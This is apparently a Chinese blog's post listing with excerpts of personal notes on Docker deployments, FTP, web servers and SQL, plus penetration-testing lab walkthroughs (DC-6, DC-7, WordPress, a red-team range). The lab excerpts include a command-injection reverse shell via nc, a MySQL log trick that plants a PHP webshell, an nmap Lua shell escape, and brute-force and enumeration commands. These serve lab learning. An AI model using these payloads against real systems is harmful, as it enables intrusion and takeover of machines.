- 博客(28)
- 收藏
- 关注
RSS订阅原创 安装最新的docekr
2、安装需要的软件包, yum-util 提供yum-config-manager功能,另外两个是devicemapper驱动依赖的。# 4、 安装docker,出现输入的界面都按 y。# 5、 查看docker版本,验证是否验证成功。# 1、yum 包更新到最新。# 3、 设置yum源。
2024-10-25 16:17:56
163
原创 docker 安装特定版本
本次用的云服务器1. 检查已安装的 Docker 组件首先,列出所有与 Docker 相关的包这将列出所有安装的与 Docker 相关的包。你可以根据输出结果确定需要卸载的包名称。
2024-10-24 10:51:14
557
2
原创 Docker部署nginx笔记(04)
2. 然后回到nginx目录创建nginx 因为下面$pwd指定了在nginx下创建。# 在~/nginx/conf/下创建nginx.conf文件,粘贴下面内容。1. # 在/root目录下创建nginx目录用于存储nginx数据信息。mkdir conf (在nginx目录里面创建conf)里面有个html目录 进入创建html文件。在物理机上访问容器的nginx服务。3. 然后cd /nginx。
2024-05-06 16:29:34
224
原创 Docker部署Tomcat(03)
v $PWD:/usr/local/tomcat/webapps:**将主机中当前目录挂载到容器的webapps。同样的在物理机上访问Docker容器的tomcat服务(本次就简单的写个html)-p 8080:8080:**将容器的8080端口映射到主机的8080端口。3.在/tomcat下创建test目录 然后在test创建a.html。4.访问虚拟机的ip加端口及目录。2.运行容器做端口映射。
2024-05-06 15:59:33
190
原创 Docker部署Mysql笔记(02)
v $PWD/conf:/etc/mysql/conf.d**:将主机当前目录下的 conf/my.cnf 挂载到容器的 /etc/mysql/my.cnf。-v $PWD/data:/var/lib/mysql** :将主机当前目录下的data目录挂载到容器的 /var/lib/mysql。-v $PWD/logs:/logs**:将主机当前目录下的 logs 目录挂载到容器的 /logs。1.在/root目录下创建mysql目录用于存储mysql数据信息。2.#创建mysql。
2024-05-06 15:03:55
280
1
原创 Docker 常见命令(01)
如果您只提供了一个路径(如 /volume),Docker 会将其视为卷的名称,并在 Docker 的默认卷存储位置创建一个新的命名卷。-t 分配一个伪终端(pseudo-TTY) 这让您能够像在使用终端或命令行界面一样与容器进行交互。-d 以“分离模式”运行容器,即容器在后台运行。#以交互式的命令创建容器 然后创建完自动的进入 退出容器自动关闭。数据卷作用:数据持久化 外部机器和内部容器通信 容器之间数据交换。当容器目录和数据卷目录绑定后,对方的修改会立即同步。#以交互式式的命令进入容器。
2024-05-06 14:21:56
253
原创 kali常见工具嗅探参数集合
wpscan --url http://192.168.10.140/wordpress -e u 用户名的枚举。##curl http://192.168.10.140/index.html.bak 这个命令可以直接显示文件里面的内容。nmap --script=auth 192.168.10.140 -v -sV auth 健权类验证脚本。wget http://192.168.10.140:5555/15285.c(15285.c是文件)
2023-12-14 15:00:00
142
1
原创 应急响应笔记来了
确定收到点击的时间范围---->利用工具或手工查找可疑日志----->攻击特征------>确定攻击的手段----->确认攻击者,还原攻击特征。一、首先确定受到攻击、入侵的时间范围,以此为线索,查找这个时间范围内可疑的日志,进一步排查,最终确定攻击者,还原攻击过程,如下图所示。确定特征文件--->特征过滤 ----->时间搜索------>确定攻击手段------>确定攻击者。应急响应------->收集信息------判断类型-------深入分析--------清理处置-------产出报告。
2023-12-14 14:54:18
94
1
原创 红日靶场的前期渗透笔记
SET GLOBAL general_log_file = 'c://phpstudy/WWW/shell.php' 改他的后缀为php 原来后缀不是php。####################################这个时候你也可以去开启它的3389端口(远程链接) 去改他的administrator的密码。现在问题是msf和CS都在kaili上那怎么去攻击正常的主机 ——————>所以要搭建一个隧道vpn CS和MSF一起搭建的隧道。如何上线域控到msf和cs上去?
2023-12-08 14:55:18
141
原创 记一次DC-6的渗透过程
input type="hidden" name="ip" value="google.fr| nc 192.168.10.144 4447 -e /bin/bash" /> 这里后面主要改ip 和反弹的端口 ip是kali的。echo 'os.execute("/bin/bash")' > shell.nse #创建一个 shell.nse 的文件,并且写入 os.execute("/bin/bash")pty.spawn('/bin/bash')" 就有新的稳定的环境了。
2023-12-07 09:11:54
115
1
原创 记一次DC-7 的靶场练习
页面是http://1929.168.10.140/node/4 密码123 连接成功 蚁剑上进入终端尝试反弹shell nc -e /bin/sh 192.168.10.140 4444。####在linux下的邮件一般有两种形式,一种是mbox形式,一种是maildir形式,mbox是以一个txt文件的形式存储用户的邮件,而maildir是以一个目录的形式,cat /var/mail/dc7user 提示去 /opt/scripts/backups.sh。
2023-12-07 09:10:26
64
1
原创 记录一次wordpress的渗透思路
wpscan --url http://192.168.10.140/wordpress -e u 用户名的枚举 发现michael steven 但不是后台管理员的密码。找到许多的用户 进行筛选 打开linux 或者kali /etc/passwd 对比 发现像bin用户后面有nologin的字样----不能登陆舍去。nmap 192.168.10.140 -v --script=brute -p22 指定22进行暴力破解 发现很多用户的枚举信息。
2023-12-01 11:53:36
250
1
原创 pikachu下的任意文件下载实验
例如在你的pikachu/vul/unsafedownload/下建一个文件1.txt。首先看到的是图片,点击任意的图片会下载,所以想到有没任意的文件下载这个漏洞。看到了文件的下载路径有了 想到用一些特殊字符如 ../返回上一级的目录。在burp上抓包 ../1.txt 路径该成这样就🆗了。看到右上角我已经下了一张科比的图像。把kn.png改成你建的文件载。
2023-11-04 11:29:11
178
1
原创 hackerbar
2、有网址的载入于访问,联合查询,各种编码,数据加密功能。这个Hackbar可以帮助你在测试SQL注入,XSS漏洞和网站的安全性,主要是帮助开发人员做代码的安全审计,检查代码,寻找安全漏洞。1、Hackbar是一个Firefox的插件,它的功能类似于地址栏,但是它里面的数据不受服务器的相应触发的重定向等其它变化的影响。3、Hackbar 在Burpsuite中也有该插件。
2023-10-16 18:36:21
671
1
原创 web服务
同时,定期进行服务器维护、更新和备份,确保服务器的安全和可用性。优化网站性能: 根据网站的需求和访问量,进行网站性能优化,包括压缩和缓存静态资源、使用CDN加速、调整数据库和服务器配置等,提升网站的加载速度和用户体验。总之,搭建完一个web服务器后,你需要进行服务器的配置和优化、网站的部署和性能优化、服务器的监控和管理等工作,以确保服务器的稳定性、安全性和性能。安装必要的软件和服务: 根据你的网站或应用程序的需求,安装和配置所需的软件和服务,比如数据库服务器、邮件服务器、缓存服务器等。
2023-10-14 17:52:27
59
1
原创 Nginx和Apache
Apache和Nginx的相同点:在功能实现上都使用了模块化结构设计,都支持通用的语言接口,如PHP、Perl、Python等,同时也支持正向、反向代理,虚拟主机,URL重写等。2.处理动态请求时,Apache性能更高(动态请求会用到伪静态,而Apache对rewrite支持的更好)高并发下能保持低资源低消耗,因此更适合做高并发(Apache采用的是select模型/线型轮询)3.处理静态网页上表现的更好(简单、占资源少),官方定义的并发量最高可达5w/s。1.轻量级,相对Apache占用更少的资源。
2023-10-11 22:39:25
88
1
原创 FTP服务
而在被动模式下,客户端先向服务器的命令端口(一般是21端口)发送数据传输请求,并等待服务器返回一个随机的高位端口号。在被动模式中,服务器的防火墙需要打开用于数据传输的端口,以便能够接收来自客户端的数据连接请求。在主动模式下,客户端主动连入服务器的数据端口(一般是20端口),而服务器则通过一个随机的高位端口(通常是1024到65535之间)向客户端发送数据。在主动模式中,客户端的防火墙需要打开服务器所使用的端口,以便能够接收来自服务器的数据传输请求。主动模式和被动模式的选择通常取决于网络环境和防火墙的配置。
2023-09-25 10:26:33
83
1
原创 OWASP的十大漏洞
OWASP(Open Web Application Security Project)是一个致力于提升网络应用安全的国际组织。他们发布了“OWASP十大最重要的安全风险”列表,该列表列出了当前网络应用中最常见的十种安全漏洞。
2023-09-16 16:20:03
444
1
原创 openEuler的FTP服务搭建
测试FTP服务:使用FTP客户端工具(如FileZilla、WinSCP等)连接到openEuler主机的FTP服务器。使用已配置好的用户名和密码进行登录,并尝试上传、下载文件等操作。配置防火墙:如果在系统上启用了防火墙(如firewalld或ufw),确保允许FTP(默认端口号为21)的入站和出站连接。安装vsftpd软件包:在openEuler系统上,使用包管理工具(dnf或zypper)安装vsftpd软件包。配置vsftpd服务:编辑vsftpd的配置文件来进行必要的配置。保存并关闭配置文件。
2023-09-15 15:01:46
1649
2
原创 本笔记为阿里云天池龙珠计划SQL训练营的学习内容,链接为:https://tianchi.aliyun.com/specials/promotion/aicampsSQL 6
关于写题后笔记写完·的这些要注意有一些小的注意点这些都是前面有的重复表格也就是数据要删除在select时写sno
2022-04-12 20:37:00
126
原创 本笔记为阿里云天池龙珠计划SQL训练营的学习内容,链接为:https://tianchi.aliyun.com/specials/promotion/aicampssql 5
sql
2022-04-11 15:22:53
280
原创 本笔记为阿里云天池龙珠计划SQL训练营的学习内容,链接为:https://tianchi.aliyun.com/specials/promotion/aicampsSQL 4
sql4
2022-04-09 22:46:09
211
原创 本笔记为阿里云天池龙珠计划SQL训练营的学习内容,链接为:https://tianchi.aliyun.com/specials/promotion/aicampssql 3
sql
2022-04-07 09:02:56
226
原创 本笔记为阿里云天池龙珠计划SQL训练营的学习内容,链接为:https://tianchi.aliyun.com/specials/promotion/aicampssql 2
*代表全部意思设定汉语时别名要用双引号括起来<>可以表否定外NOT 也可以但范围更广AND的优先级高于ORAVG:计算表中数值列中数据的平均值HAVING子句用于对分组进行过滤,可以使用数字、聚合函数和GROUP BY中指定的列名(聚合键)执行顺序FROM → WHERE → GROUP BY → HAVING → SELECT → ORDER BY...
2022-04-06 22:08:03
85
原创 本笔记为阿里云天池龙珠计划SQL训练营的学习内容,链接为:https://tianchi.aliyun.com/specials/promotion/aicampsql;sql 1
sql 1
2022-04-05 16:45:12
266
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人